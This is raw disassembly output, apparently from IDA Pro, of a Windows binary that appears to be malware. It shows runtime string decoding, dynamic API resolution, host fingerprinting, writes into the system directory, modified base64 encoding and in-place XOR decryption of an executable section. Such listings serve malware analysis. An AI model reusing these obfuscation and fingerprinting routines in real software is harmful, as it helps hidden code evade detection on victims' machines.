; ---------------------------------------------------------------------------
loc_43A9A8: ; CODE XREF: sub_43A34D+638�j
inc edi
loc_43A9A9: ; CODE XREF: sub_43A34D+583�j
mov eax, dword_44B13C
add eax, 62h
cmp edi, eax
jb loc_43A8D5
loc_43A9B9: ; CODE XREF: sub_43A34D+5BA�j
; sub_43A34D+5F1�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_43A34D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43A9C0 proc near ; CODE XREF: sub_43B780+17D�p
; sub_43F0EA+CC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, [ebp+arg_4]
push ebx
call ds:dword_445000 ; lstrlenW
mov edi, eax
push 0
push 0
movsx eax, word_44B154
add eax, 1FF7h
push eax
push esi
push edi
push ebx
mov eax, dword_44B1C0
sub eax, 3
push eax
push 0
call ds:dword_44500C ; WideCharToMultiByte
mov eax, dword_44B138
add eax, dword_44B120
sub eax, 0Ah
mov [esi+edi], al
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_43A9C0 endp
; =============== S U B R O U T I N E =======================================
sub_43AA12 proc near ; CODE XREF: sub_442C0A+11�p
push edi
push offset dword_44C7A8
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1E0, eax
test eax, eax
jnz short loc_43AA45
push offset byte_44C79B
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1E0, eax
loc_43AA45: ; CODE XREF: sub_43AA12+1A�j
push offset dword_44C78C
call sub_4424C1
push eax
push dword_44B1E0
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448250, eax
push offset word_44C77A
call sub_4424C1
add esp, 8
push eax
push dword_44B1E0
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_446120, eax
pop edi
retn
sub_43AA12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AA82 proc near ; DATA XREF: .data:0044B298�o
push ebp
mov ebp, esp
push offset dword_44A784
call ds:dword_447A3C ; InterlockedIncrement
mov eax, ds:dword_44A784
pop ebp
retn 4
sub_43AA82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AA99 proc near ; DATA XREF: sub_43B52C+6B�o
; sub_43B52C+76�o
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
movsx eax, word_44B090
add eax, dword_44B1AC
sub eax, 5
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_43AAD1
push offset dword_4470F0
lea eax, [ebp+var_110]
push eax
call sub_444B60
jmp short loc_43AAE2
; ---------------------------------------------------------------------------
loc_43AAD1: ; CODE XREF: sub_43AA99+23�j
push offset dword_448260
lea eax, [ebp+var_110]
push eax
call sub_444B60
loc_43AAE2: ; CODE XREF: sub_43AA99+36�j
push 0
mov eax, dword_44B1C8
movsx edx, word_44B194
add eax, edx
sub eax, 2
push eax
push 4
push 0
movsx eax, word_44B0E0
add eax, dword_44B124
dec eax
push eax
push 40000000h
lea eax, [ebp+var_110]
push eax
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_8], eax
push 2
push 0
mov eax, dword_44B1C8
sub eax, 2
push eax
push [ebp+var_8]
call ds:dword_44AB9C ; SetFilePointer
push offset word_44C772
call sub_4424C1
pop ecx
push 0
lea edx, [ebp+var_C]
push edx
movsx edx, word_44B16C
movsx ecx, word_44B1BC
add edx, ecx
sub edx, 6
push edx
push eax
push [ebp+var_8]
call ds:dword_44AB8C ; WriteFile
push 493E0h
push 40h
call ds:dword_447A34 ; LocalAlloc
mov ebx, eax
push 61A80h
push 40h
call ds:dword_447A34 ; LocalAlloc
mov esi, eax
movsx eax, word_44B0E0
add eax, dword_44B0B4
sub eax, 8
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_43ABA7
mov eax, [ebp+arg_0]
inc eax
push eax
push ebx
call sub_444B60
jmp short loc_43ABB0
; ---------------------------------------------------------------------------
loc_43ABA7: ; CODE XREF: sub_43AA99+FF�j
push [ebp+arg_0]
push ebx
call sub_444B60
loc_43ABB0: ; CODE XREF: sub_43AA99+10C�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_43ABB5: ; CODE XREF: sub_43AA99+121�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43ABB5
mov [ebp+var_4], eax
mov eax, dword_44B0CC
mov edi, eax
add edi, dword_44B184
sub edi, 7
jmp short loc_43ABF7
; ---------------------------------------------------------------------------
loc_43ABD1: ; CODE XREF: sub_43AA99+161�j
movzx eax, byte ptr [ebx+edi]
mov [ebp+var_114], eax
mov eax, edi
mul edi
mov [ebp+var_118], eax
mov eax, [ebp+var_114]
mov edx, [ebp+var_118]
add eax, edx
mov [ebx+edi], al
inc edi
loc_43ABF7: ; CODE XREF: sub_43AA99+136�j
cmp edi, [ebp+var_4]
jb short loc_43ABD1
mov eax, dword_44B12C
add eax, 61A73h
movsx edx, word_44B154
add eax, edx
push eax
push esi
push [ebp+var_4]
push ebx
call sub_43B3A7
add esp, 10h
mov eax, dword_44B0C0
mov edi, eax
add edi, dword_44B1AC
sub edi, 5
jmp short loc_43AC44
; ---------------------------------------------------------------------------
loc_43AC2F: ; CODE XREF: sub_43AA99+1B9�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_43AC39
mov byte ptr [esi+edi], 28h
loc_43AC39: ; CODE XREF: sub_43AA99+19A�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_43AC43
mov byte ptr [esi+edi], 29h
loc_43AC43: ; CODE XREF: sub_43AA99+1A4�j
inc edi
loc_43AC44: ; CODE XREF: sub_43AA99+194�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43AC49: ; CODE XREF: sub_43AA99+1B5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43AC49
cmp edi, eax
jb short loc_43AC2F
mov eax, dword_44B174
sub eax, 9
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_43AC82
push 0
lea eax, [ebp+var_C]
push eax
mov eax, dword_44B0FC
sub eax, 6
push eax
push offset asc_44C770 ; "*"
push [ebp+var_8]
call ds:dword_44AB8C ; WriteFile
loc_43AC82: ; CODE XREF: sub_43AA99+1CA�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_43AC87: ; CODE XREF: sub_43AA99+1F3�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43AC87
push 0
lea edx, [ebp+var_C]
push edx
movsx edx, word_44B168
sub edx, 7
mov edi, eax
add edi, edx
push edi
push esi
push [ebp+var_8]
call ds:dword_44AB8C ; WriteFile
push [ebp+var_8]
call ds:dword_449650 ; CloseHandle
push ebx
call ds:dword_447618 ; LocalFree
push esi
call ds:dword_447618 ; LocalFree
pop edi
pop esi
pop ebx
leave
retn
sub_43AA99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43ACC9 proc near ; CODE XREF: sub_44287C+18�p
; sub_443589+165�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_43AD11
cmp [ebp+arg_4], 0
jz short loc_43AD0D
mov eax, [ebp+arg_4]
mov edx, dword_44B0F8
add edx, dword_44B09C
sub edx, 0Ah
mov [eax], edx
loc_43AD0D: ; CODE XREF: sub_43ACC9+2E�j
xor eax, eax
jmp short loc_43AD55
; ---------------------------------------------------------------------------
loc_43AD11: ; CODE XREF: sub_43ACC9+28�j
push 0
push edi
call ds:dword_44A624 ; GetFileSize
mov esi, eax
add eax, 10h
push eax
push 40h
call ds:dword_447A34 ; LocalAlloc
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_43AD3A
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_43AD40
; ---------------------------------------------------------------------------
loc_43AD3A: ; CODE XREF: sub_43ACC9+67�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_43AD40: ; CODE XREF: sub_43ACC9+6F�j
push [ebp+var_8]
push esi
push ebx
push edi
call ds:dword_445028 ; ReadFile
push edi
call ds:dword_449650 ; CloseHandle
mov eax, ebx
loc_43AD55: ; CODE XREF: sub_43ACC9+46�j
pop edi
pop esi
pop ebx
leave
retn
sub_43ACC9 endp
; =============== S U B R O U T I N E =======================================
sub_43AD5A proc near ; CODE XREF: sub_442C0A+2A�p
push edi
push offset byte_44C761
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1F4, eax
test eax, eax
jnz short loc_43AD8D
push offset word_44C752
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1F4, eax
loc_43AD8D: ; CODE XREF: sub_43AD5A+1A�j
push offset word_44C73E
call sub_4424C1
pop ecx
push eax
push dword_44B1F4
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_447A44, eax
pop edi
retn
sub_43AD5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43ADAC proc near ; CODE XREF: sub_43B52C+17F�p
var_170 = byte ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_43BFE5
push offset byte_44C739
call sub_4424C1
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_445020
push offset byte_44C731
call sub_4424C1
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
add esp, 24h
push 0
movsx eax, word_44B100
add eax, dword_44B0E4
sub eax, 0Bh
push eax
push 3
push 0
mov eax, dword_44B160
sub eax, 8
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_43AE6F
mov eax, dword_44B160
sub eax, 8
mov edx, [ebp+arg_0]
movsx ecx, word_44B0B0
sub ecx, 8
mov [edx+eax], cl
jmp short loc_43AED3
; ---------------------------------------------------------------------------
loc_43AE6F: ; CODE XREF: sub_43ADAC+A7�j
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_44AB9C ; SetFilePointer
push 0
lea eax, [ebp+var_170]
push eax
movsx eax, word_44B0B0
mov edx, dword_44B124
lea eax, [eax+edx+0Bh]
push eax
push [ebp+arg_0]
push edi
call ds:dword_445028 ; ReadFile
mov [ebp+var_16C], eax
push edi
call ds:dword_449650 ; CloseHandle
mov eax, dword_44B0C4
sub eax, 4
cmp [ebp+var_16C], eax
jnz short loc_43AED3
mov eax, dword_44B130
mov edx, [ebp+arg_0]
mov ecx, dword_44B1C4
sub ecx, 5
mov [edx+eax], cl
loc_43AED3: ; CODE XREF: sub_43ADAC+C1�j
; sub_43ADAC+111�j
pop edi
pop esi
leave
retn
sub_43ADAC endp
; =============== S U B R O U T I N E =======================================
sub_43AED7 proc near ; CODE XREF: sub_442C0A+1B�p
push edi
push offset byte_44C721
call sub_4424C1
pop ecx
push eax
call ds:dword_4475E8 ; GetModuleHandleA
mov dword_44B1E8, eax
test eax, eax
jnz short loc_43AF0A
push offset byte_44C711
call sub_4424C1
pop ecx
push eax
call ds:dword_448244 ; LoadLibraryA
mov dword_44B1E8, eax
loc_43AF0A: ; CODE XREF: sub_43AED7+1A�j
push offset byte_44C6FF
call sub_4424C1
push eax
push dword_44B1E8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445044, eax
push offset word_44C6EE
call sub_4424C1
push eax
push dword_44B1E8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABA0, eax
push offset word_44C6DE
call sub_4424C1
push eax
push dword_44B1E8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_44ABB0, eax
push offset byte_44C6CF
call sub_4424C1
push eax
push dword_44B1E8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_445038, eax
push offset byte_44C6BF
call sub_4424C1
add esp, 14h
push eax
push dword_44B1E8
call ds:dword_4471F8 ; GetProcAddress
mov ds:dword_448254, eax
pop edi
retn
sub_43AED7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AF9B proc near ; CODE XREF: sub_43C281+D1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_44B250
push offset dword_44B210
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4440F8
pop ebp
retn
sub_43AF9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43AFB5 proc near ; CODE XREF: sub_43B52C+91�p
var_1AC = dword ptr -1ACh
var_1A8 = byte ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call ds:dword_44AB98 ; GetVersionExA
cmp [ebp+var_183], 1
jnz short loc_43AFFB
push offset byte_44C6B9
call sub_4424C1
push eax
push edi
call ds:dword_445020
add esp, 0Ch
loc_43AFFB: ; CODE XREF: sub_43AFB5+2F�j
cmp [ebp+var_183], 2
jnz short loc_43B019
push offset byte_44C6B3
call sub_4424C1
push eax
push edi
call ds:dword_44A634
add esp, 0Ch
loc_43B019: ; CODE XREF: sub_43AFB5+4D�j
push offset byte_44C6A7
call sub_4424C1
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea esi, [ebp+var_FF]
push esi
call ds:dword_44A634
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_445020
push offset dword_44C6A0
call sub_4424C1
mov esi, dword_44B1A0
sub esi, 6
push esi
push 0
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_198]
push esi
push 0FFh
lea esi, [ebp+var_FF]
push esi
push eax
call ds:dword_44A614 ; GetVolumeInformationA
push offset dword_44C698
call sub_4424C1
push [ebp+var_198]
push eax
lea esi, [ebp+var_FF]
push esi
call ds:dword_44A634
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_445020
push 0FFh
lea eax, [ebp+var_FF]
push eax
mov eax, dword_44B18C
add eax, 2
push eax
push 400h
call ds:dword_4475F4 ; GetLocaleInfoA
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_445020
push offset byte_44C693
call sub_4424C1
push eax
push edi
call ds:dword_445020
mov [ebp+var_1A0], 0FFh
push offset word_44C666
call sub_4424C1
mov [ebp+var_1AC], eax
push offset byte_44C659
call sub_4424C1
lea esi, [ebp+var_1A8]
push esi
lea esi, [ebp+var_1A0]
push esi
lea esi, [ebp+var_FF]
push esi
push eax
mov esi, [ebp+var_1AC]
push esi
push 80000002h
call sub_440FBB
add esp, 70h
mov [ebp+var_1A4], eax
mov eax, dword_44B190
add eax, dword_44B1AC
sub eax, 6
cmp [ebp+var_1A4], eax
jnz short loc_43B176
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_445020
add esp, 8
loc_43B176: ; CODE XREF: sub_43AFB5+1AE�j
pop edi
pop esi
leave
retn
sub_43AFB5 endp
; =============== S U B R O U T I N E =======================================
sub_43B17A proc near ; DATA XREF: .data:0044B2C4�o
mov eax, 80004001h
retn 10h
sub_43B17A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B182 proc near ; CODE XREF: sub_442E96+35E�p
; sub_442E96+3E5�p
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 16Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_43BFE5
push offset dword_44C654
call sub_4424C1
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_445020
push offset dword_44C64C
call sub_4424C1
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
add esp, 24h
push 0
push 80h
push 4
push 0
mov eax, dword_44B0C0
add eax, dword_44B1C0
sub eax, 4
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_44AB9C ; SetFilePointer
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43B237: ; CODE XREF: sub_43B182+BA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B237
mov esi, eax
push 0
lea ebx, [ebp+var_16C]
push ebx
push esi
push [ebp+arg_0]
push edi
call ds:dword_44AB8C ; WriteFile
push edi
call ds:dword_449650 ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_43B182 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B260 proc near ; CODE XREF: sub_43E40A+8E�p
; sub_43E40A+15D�p
var_10003 = dword ptr -10003h
var_FFFF = byte ptr -0FFFFh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_444B40
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
lea edi, dword_448260
cmp [ebp+arg_4], 43h
jnz short loc_43B285
lea edi, dword_4470F0
loc_43B285: ; CODE XREF: sub_43B260+1D�j
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push edi
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_43B32E
push 0
push 0
push esi
push edi
call ds:dword_44AB9C ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
push 0FFFFh
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_445028 ; ReadFile
lea ecx, [ebp+var_FFFF]
or eax, 0FFFFFFFFh
loc_43B2D7: ; CODE XREF: sub_43B260+7C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B2D7
mov edx, dword_44B0C4
add edx, 1
mov ebx, eax
add ebx, edx
mov [ebp+var_4], ebx
mov ebx, dword_44B158
mov edx, [ebp+var_4]
mov [ebp+ebx*4+var_10003], edx
push 0
push 0
push esi
push edi
call ds:dword_44AB9C ; SetFilePointer
push 0
lea eax, [ebp+var_4]
push eax
mov eax, dword_44B178
add eax, 1
push eax
lea eax, [ebp+var_10003]
push eax
push edi
call ds:dword_44AB8C ; WriteFile
push edi
call ds:dword_449650 ; CloseHandle
loc_43B32E: ; CODE XREF: sub_43B260+43�j
pop edi
pop esi
pop ebx
leave
retn
sub_43B260 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B333 proc near ; CODE XREF: sub_442C0A+1E5�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov edi, esi
add edi, eax
mov eax, [edi+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
movsx edx, word_44B0C8
mov ecx, dword_44B1B4
lea edx, [edx+ecx+1F8h]
mov ebx, eax
imul ebx, edx
movsx eax, word_44B168
mov edi, eax
add edi, dword_44B0F8
sub edi, 8
jmp short loc_43B396
; ---------------------------------------------------------------------------
loc_43B388: ; CODE XREF: sub_43B333+65�j
movzx eax, byte ptr [esi+edi]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+edi], al
inc edi
loc_43B396: ; CODE XREF: sub_43B333+53�j
cmp edi, ebx
jb short loc_43B388
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_43B333 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B3A7 proc near ; CODE XREF: sub_43AA99+17C�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_43B417
xor eax, eax
jmp loc_43B4C1
; ---------------------------------------------------------------------------
loc_43B3DF: ; CODE XREF: sub_43B3A7+80�j
push esi
push [ebp+arg_0]
call sub_43BE80
add esp, 8
mov eax, dword_44B188
add eax, 3
sub ebx, eax
movsx eax, word_44B0D0
mov edx, dword_44B118
lea eax, [eax+edx+2]
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
mov eax, dword_44B140
sub eax, 4
lea esi, [esi+eax]
loc_43B417: ; CODE XREF: sub_43B3A7+2F�j
mov eax, dword_44B17C
add eax, dword_44B0EC
sub eax, 8
cmp ebx, eax
jnb short loc_43B3DF
movsx eax, word_44B16C
sub eax, 4
cmp ebx, eax
jbe short loc_43B4A4
push 3
mov eax, dword_44B130
add eax, dword_44B18C
dec eax
push eax
lea eax, [ebp+var_7]
push eax
call ds:dword_449640
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call ds:dword_449634
push esi
lea eax, [ebp+var_7]
push eax
call sub_43BE80
add esp, 20h
mov eax, dword_44B14C
add eax, dword_44B184
sub eax, 9
mov byte ptr [esi+eax], 3Dh
movsx eax, word_44B0E0
inc eax
cmp ebx, eax
jnz short loc_43B49B
mov eax, dword_44B104
add eax, dword_44B0D4
sub eax, 2
mov byte ptr [esi+eax], 3Dh
loc_43B49B: ; CODE XREF: sub_43B3A7+E0�j
mov eax, dword_44B1C0
inc eax
lea esi, [esi+eax]
loc_43B4A4: ; CODE XREF: sub_43B3A7+8E�j
mov eax, dword_44B134
add eax, dword_44B144
sub eax, 8
mov edx, dword_44B104
sub edx, 3
mov [esi+eax], dl
xor eax, eax
inc eax
loc_43B4C1: ; CODE XREF: sub_43B3A7+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_43B3A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43B4C6 proc near ; DATA XREF: sub_43E8A2+15B�o
var_A = byte ptr -0Ah
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+arg_0]
push offset sub_4401E7
push dword ptr fs:0
mov fs:0, esp
push offset dword_44C644
call sub_4424C1
push dword ptr [edi]
push eax
lea esi, [ebp+var_A]
push esi
call ds:dword_44A634
add esp, 10h
loc_43B4FC: ; CODE XREF: sub_43B4C6+5E�j
push 0
push dword ptr [edi]
lea eax, [ebp+var_A]
push eax
call sub_4438E7
mov eax, dword_44B098
movsx edx, word_44B170
add eax, edx
sub eax, 0Fh
push eax
call ds:dword_44A630
add esp, 10h
jmp short loc_43B4FC
sub_43B4C6 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B52C proc near ; CODE XREF: sub_442C0A+23F�p
var_209 = byte ptr -209h
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_1FE = byte ptr -1FEh
var_107 = byte ptr -107h
var_102 = byte ptr -102h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
push ebp
mov ebp, esp
sub esp, 20Ch
push edi
push 0FFh
lea eax, [ebp+var_1FE]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
push offset byte_44C631
call sub_4424C1
movsx edi, word_44B148
sub edi, 2
push edi
lea edi, [ebp+var_1FE]
push edi
push eax
push offset dword_4470F0
call ds:dword_44A634
push offset word_44C61E
call sub_4424C1
mov edi, dword_44B0F0
sub edi, 3
push edi
lea edi, [ebp+var_1FE]
push edi
push eax
push offset dword_448260
call ds:dword_44A634
lea eax, sub_43AA99
mov ds:dword_44A62C, eax
lea eax, sub_43AA99
mov ds:dword_44504C, eax
lea eax, sub_44287C
mov ds:dword_44A774, eax
push offset dword_446020
call sub_43AFB5
mov eax, dword_44B1AC
add eax, 6
push eax
push offset dword_448230
call sub_44244A
lea eax, sub_443C06
mov ds:dword_448228, eax
lea eax, sub_43DE0F
mov ds:dword_447A30, eax
lea eax, dword_4470F0
mov ds:dword_44963C, eax
lea eax, dword_448260
mov ds:dword_445018, eax
lea eax, dword_44A670
mov dword_44B2B0, eax
lea eax, [ebp+var_204]
push eax
mov eax, dword_44B0AC
sub eax, 3
push eax
push 0
push offset sub_440914
mov eax, dword_44B0F8
add eax, dword_44B104
sub eax, 5
push eax
push 0
call ds:dword_44AB90 ; CreateThread
push eax
call ds:dword_449650 ; CloseHandle
lea eax, [ebp+var_208]
push eax
mov eax, dword_44B198
mov edx, dword_44B184
add edx, eax
sub edx, 0Eh
push edx
push 0
push offset sub_43C256
movsx edx, word_44B0E8
add edx, eax
lea eax, [edx-0Dh]
push eax
push 0
call ds:dword_44AB90 ; CreateThread
push eax
call ds:dword_449650 ; CloseHandle
mov eax, dword_44B174
inc eax
movsx edx, word_44B0E0
add eax, edx
mov ds:dword_44761C, eax
movsx eax, word_44B0BC
movsx edx, word_44B128
add eax, edx
sub eax, 8
push eax
lea eax, [ebp+var_FF]
push eax
call sub_43ADAC
add esp, 3Ch
mov eax, dword_44B0A4
add eax, dword_44B124
cmp [ebp+eax+var_102], 64h
jnz short loc_43B705
movsx eax, [ebp+var_FE]
mov edx, dword_44B0B8
add edx, 1Ch
add edx, dword_44B1A4
sub eax, edx
mov [ebp+var_209], al
movzx eax, [ebp+var_209]
push eax
push 0
call sub_441FCC
add esp, 8
mov eax, dword_44B0B4
sub eax, 8
mov ds:dword_44761C, eax
loc_43B705: ; CODE XREF: sub_43B52C+19A�j
movsx eax, word_44B170
add eax, dword_44B164
cmp [ebp+eax+var_107], 67h
jnz short loc_43B775
mov eax, dword_44B188
add eax, 7
add eax, dword_44B0AC
movsx edx, word_44B1BC
add edx, dword_44B1CC
sub edx, 0Ah
mov [ebp+eax+var_FF], dl
lea eax, [ebp+var_FE]
push eax
call ds:dword_445054
mov [ebp-20Ch], eax
push eax
push offset dword_44A670
call sub_43E1CC
add esp, 0Ch
mov eax, dword_44B10C
add eax, dword_44B174
sub eax, 10h
mov ds:dword_44761C, eax
loc_43B775: ; CODE XREF: sub_43B52C+1EE�j
pop edi
leave
retn
sub_43B52C endp
; =============== S U B R O U T I N E =======================================
sub_43B778 proc near ; DATA XREF: .data:0044B2E8�o
mov eax, 80004001h
retn 10h
sub_43B778 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B780 proc near ; CODE XREF: sub_443589+E�p
; sub_443589+1DB�p
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10068 = dword ptr -10068h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_10059 = byte ptr -10059h
var_10058 = dword ptr -10058h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10043 = byte ptr -10043h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10088h
call sub_444B40
push ebx
push esi
push edi
mov [ebp+var_40], 8
push offset dword_44C610
call sub_43EFD7
pop ecx
push eax
call ds:dword_445044
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
mov eax, dword_44B0F0
sub eax, 4
